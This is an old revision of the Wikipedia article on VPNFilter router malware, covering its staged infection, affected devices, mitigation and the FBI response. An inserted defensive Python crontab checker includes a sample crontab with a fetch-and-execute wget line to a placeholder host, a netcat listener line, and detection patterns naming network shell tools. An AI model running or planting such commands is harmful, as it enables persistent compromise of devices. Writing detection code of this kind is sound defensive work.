VPNFilter

From Wikipedia, the free encyclopedia
This is an old revision of this page, as edited by Eapender (talk | contribs) at 15:44, 26 June 2018 (Add additional details about stage 1, reduce generality of existing text). The present address (URL) is a permanent link to this revision, which may differ significantly from the current revision.

VPNFilter is malware designed to infect routers. As of 24 May 2018, it is estimated to have infected approximately 500,000 routers worldwide, though the number of at-risk devices is larger.[1] It can steal data, contains a "kill switch" designed to disable the infected router on command, and is able to persist should the user reboot the router.[2] The FBI believes that it was created by the Russian Fancy Bear group.[3][4]

Operation

VPNFilter is malware infecting a number of different kinds of network routers and storage devices. It seems to be designed in part to target serial networking devices using the Modbus protocol to talk to and control industrial hardware, as in factories and warehouses. The malware has special, dedicated code to target control systems using SCADA.[5]

The initial infection vector is still unknown. The Cisco Talos security group hypothesizes that the malware exploits known router security vulnerabilities to infect devices.[6]

This software installs itself in multiple stages:

  1. Stage 1 involves a worm which adds code to the device's crontab (the list of tasks run at regular intervals by the cron scheduler on Linux). This allows it to remain on the device after a reboot, and to re-infect it with the subsequent stages if they are removed. Stage 1 uses known URLs to find and install Stage 2 malware. If those known URLs are disabled, Stage 1 sets up a socket listener on the device and waits to be contacted by command and control systems.[7]
  2. Stage 2 is the body of the malware, including the basic code that carries out all normal functions and executes any instructions requested by special, optional Stage 3 modules.
  3. Stage 3 can be any of various "modules" that tell the malware to do specific things, like spying on industrial control devices (Modbus SCADA) or using the Tor anonymity network to communicate over an encrypted channel.[5]
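As an added illustration of the Stage 1 persistence mechanism described above (this is not code from the original article or from any VPNFilter analysis): a small Python checker that flags crontab entries showing either behaviour, re-fetching and executing remote content, or opening a listening socket. The tool names it looks for and the sample crontab are constructed assumptions.

```python
import re

# Heuristics for the two Stage 1 behaviours described above: a cron entry that
# re-fetches and runs remote content, or one that opens a listening socket.
# The tool names assumed here are typical of BusyBox-based firmware.
FETCH_RE = re.compile(r"\b(wget|curl|ftpget|tftp)\b.*?(https?://|ftp://|\d{1,3}(?:\.\d{1,3}){3})", re.I)
EXEC_RE = re.compile(r"\|\s*(sh|ash|bash)\b|chmod\s+\+?x|(&&|;)\s*(\./|/tmp/)", re.I)
LISTEN_RE = re.compile(r"\b(nc|netcat|ncat)\b[^;|&]*\s-l|\bsocat\b.*?\b(tcp|udp)\d?-listen", re.I)

def parse_crontab_line(line):
    """Return (schedule, command) for a crontab entry, or None for blank lines,
    comments and VAR=value assignments. Handles both the five-field schedule
    and @reboot-style shortcuts."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#") or re.match(r"\w+=", stripped):
        return None
    if stripped.startswith("@"):
        parts = stripped.split(None, 1)
    else:
        fields = stripped.split(None, 5)
        if len(fields) < 6:
            return None
        parts = [" ".join(fields[:5]), fields[5]]
    return (parts[0], parts[1]) if len(parts) == 2 else None

def find_suspicious_entries(crontab_text):
    """Scan a crontab and return (line_no, reason, command) tuples for entries
    matching the fetch-and-execute pattern or the listening-socket fallback."""
    findings = []
    for no, line in enumerate(crontab_text.splitlines(), 1):
        parsed = parse_crontab_line(line)
        if parsed is None:
            continue
        _, cmd = parsed
        if FETCH_RE.search(cmd) and EXEC_RE.search(cmd):
            findings.append((no, "downloads and executes remote content", cmd))
        elif LISTEN_RE.search(cmd):
            findings.append((no, "opens a listening socket", cmd))
    return findings

# Constructed sample crontab (not a real VPNFilter artefact): two benign
# entries, one fetch-and-execute entry and one listener entry.
SAMPLE_CRONTAB = """\
# constructed sample crontab
PATH=/usr/bin:/bin
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * wget -q http://updates.example.invalid/s2 -O /tmp/s2 && chmod +x /tmp/s2 && /tmp/s2
@reboot /bin/busybox nc -lp 4444 > /tmp/cmd
30 2 * * 0 curl -s https://www.example.com/health > /dev/null
"""
```

Running `find_suspicious_entries(SAMPLE_CRONTAB)` flags lines 4 and 5 of the sample and leaves the logrotate and plain curl entries alone; on a real device the same function can be fed the output of `crontab -l` or the files under `/etc/crontabs`.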

What it does

VPNFilter uses multiple third-stage operations after the initial infection. One such function of VPNFilter is to sniff traffic on a network connected to the infected device and gather credentials and supervisory control and data acquisition (SCADA) data. The data are then encrypted and exfiltrated via the Tor network.

It can also serve as a relay point to hide the origin of subsequent attacks.

Mitigation

Both Cisco and Symantec suggest that people who own affected devices do a factory reset. That is typically accomplished by using a small, pointed object, such as a straightened-out paperclip, to push the small reset button on the back of the unit for 10 to 30 seconds (time varies by model). This will remove the malware, but also restores the router to all of its original settings. If the router has remote management enabled, a factory reset will often disable it, since disabled remote management is the default setting of many routers. Remote management is thought to be one possible vector for the initial attack.

Before connecting the factory-reset router to the internet again, the device's default passwords should be changed to prevent reinfection.[8]

Devices at Risk

The initial worm that installs VPNFilter can only attack devices running embedded Linux firmware based on BusyBox, compiled for specific processors only. This does not include non-embedded Linux devices such as workstations and servers.[9]

Manufacturer-provided firmware on the following router models is known to be at risk:[10][7]

Asus Devices:

  • RT-AC66U
  • RT-N10
  • RT-N10E
  • RT-N10U
  • RT-N56U
  • RT-N66U

D-Link Devices:

  • DES-1210-08P
  • DIR-300
  • DIR-300A
  • DSR-250N
  • DSR-500N
  • DSR-1000
  • DSR-1000N

Huawei Devices:

  • HG8245

Linksys Devices:

  • E1200
  • E2500
  • E3000
  • E3200
  • E4200
  • RV082
  • WRVS4400N

Mikrotik Devices:

  • CCR1009
  • CCR1016
  • CCR1036
  • CCR1072
  • CRS109
  • CRS112
  • CRS125
  • RB411
  • RB450
  • RB750
  • RB911
  • RB921
  • RB941
  • RB951
  • RB952
  • RB960
  • RB962
  • RB1100
  • RB1200
  • RB2011
  • RB3011
  • RB Groove
  • RB Omnitik
  • STX5
  • Mikrotik RouterOS versions up to 6.38.5 on current or 6.37.5 on bugfix release chains[11]

Netgear Devices:

  • DG834
  • DGN1000
  • DGN2200
  • DGN3500
  • FVS318N
  • MBRN3000
  • R6400
  • R7000
  • R8000
  • WNR1000
  • WNR2000
  • WNR2200
  • WNR4000
  • WNDR3700
  • WNDR4000
  • WNDR4300
  • WNDR4300-TN
  • UTM50

QNAP Devices:

  • TS251
  • TS439 Pro
  • Other QNAP NAS devices running QTS software

TP-Link Devices:

  • R600VPN
  • TL-WR741ND
  • TL-WR841N

Ubiquiti Devices:

  • NSM2
  • PBE M5

Upvel Devices (see note 1):

ZTE Devices:

  • ZXHN H108N

Epidemiology

VPNFilter is described by Cisco Talos as having infected as many as 500,000 devices worldwide,[9] in perhaps 54 different countries, though proportionately the focus has been on Ukraine.

FBI investigation

The FBI has taken a high-profile role in addressing this malware, conducting an investigation that resulted in the seizure of the domain name toknowall.com, which had ostensibly been used to redirect queries from stage 1 of the malware, allowing it to locate and install copies of stages 2 and 3.[4]

Encouraging attempted reinfection

On 25 May 2018, the FBI suggested instead that users simply reboot their routers. This would temporarily remove the dangerous payload of the malware but leave the device infected with Stage 1, which would then try to re-download the payload and infect the router again. The FBI said that this would help them to find the servers distributing the payload.[12][13][3]

Notes

  1. ^ Malware targeting Upvel as a vendor has been discovered, but we[who?] are unable to determine which specific device it is targeting.

References

  1. ^ "VPNFilter Update and Our First Summit Recap". Talos. 2018-06-21. Retrieved 2018-06-26.
  2. ^ "VPNFilter state-affiliated malware pose lethal threat to routers". SlashGear. 2018-05-24. Retrieved 2018-05-31.
  3. ^ a b Kevin Poulsen (23 May 2018). "Exclusive: FBI Seizes Control of Russian Botnet". Daily Beast.
  4. ^ a b "FBI to all router users: Reboot now to neuter Russia's VPNFilter malware".
  5. ^ a b "VPNFilter: New Router Malware with Destructive Capabilities".
  6. ^ "VPNFilter, the Unfiltered Story". Talos. 2018-05-29. Retrieved 2018-06-26.
  7. ^ a b William Largent (6 June 2018). "VPNFilter Update - VPNFilter exploits endpoints, targets new devices".
  8. ^ "Security Advisory for VPNFilter Malware on Some NETGEAR Devices". Netgear. 2018-06-06. Retrieved 2018-06-26.
  9. ^ a b "Hackers infect 500,000 consumer routers all over the world with malware". Ars Technica. Retrieved 2018-05-31.
  10. ^ "VPNFilter: New Router Malware with Destructive Capabilities". Retrieved 2018-05-31.
  11. ^ "VPNfilter official statement - MikroTik". forum.mikrotik.com. Retrieved 2018-05-31.
  12. ^ Dan Goodin (25 May 2018). "FBI tells router users to reboot now to kill malware infecting 500k devices". Ars Technica.
  13. ^ Dan Goodin (24 May 2018). "Hackers infect 500,000 consumer routers all over the world with malware". Ars Technica.